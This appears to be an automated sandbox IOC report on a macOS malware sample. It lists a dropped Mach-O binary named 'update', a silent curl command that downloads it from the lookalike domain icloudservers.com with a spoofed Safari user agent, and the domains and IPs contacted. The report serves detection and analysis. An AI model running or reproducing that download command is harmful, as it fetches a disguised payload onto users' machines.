Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

/Users/bernard/Desktop/download/update

dropped

Details

File:	/Users/bernard/Desktop/download/update
Category:	dropped
Dump:	update.243.dr
ID:	dr_0
Target ID:	243
Process:	/usr/bin/curl
Type:	Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|PIE>]
Entropy:	3.5196156905652614
Encrypted:	false
Ssdeep:	12288:uHuLkNPM6lPFVCAzllOEOWuLkNPM6lPFVCAzllOEOYl:lkW6lNEGORkW6lNEGOYl
Size:	1630344
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Writes FAT Mach-O files to disk	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32

/usr/bin/curl

/usr/bin/curl -t 2 -v --connect-timeout 10 -L --remote-name --insecure --silent --user-agent Mozilla/5.0 (Macintosh Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 https://icloudservers.com/gm/update

Details

PID:	650
Target ID:	243
Parent PID:	568
Name:	curl
Path:	/usr/bin/curl
Commandline:	/usr/bin/curl -t 2 -v --connect-timeout 10 -L --remote-name --insecure --silent --user-agent Mozilla/5.0 (Macintosh Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 https://icloudservers.com/gm/update
Size:	185072
MD5:	2418204e23e2952e7995f1819a1f78f5
Time:	17:05:50
Date:	10/06/2025

/usr/libexec/xpcproxy

/usr/libexec/nsurlstoraged

/usr/libexec/nsurlstoraged --privileged

/usr/libexec/xpcproxy

/usr/libexec/firmwarecheckers/eficheck/eficheck

/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon

Domains

Name

Malicious

icloudservers.com

104.21.112.1

Details

Name:	icloudservers.com
IP:	104.21.112.1
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

104.21.112.1

icloudservers.com

United States

Details

IP:	104.21.112.1
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	icloudservers.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

23.58.91.134

unknown

United States

Details

IP:	23.58.91.134
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	16625
ASN name:	AKAMAI-ASUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

199.232.91.6

unknown

United States

Details

IP:	199.232.91.6
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	54113
ASN name:	FASTLYUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
https://icloudservers.com/gm/update

Files

Processes

Domains

IPs

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reporthttps://icloudservers.com/gm/update

Files

Processes

Domains

IPs

IOC Report
https://icloudservers.com/gm/update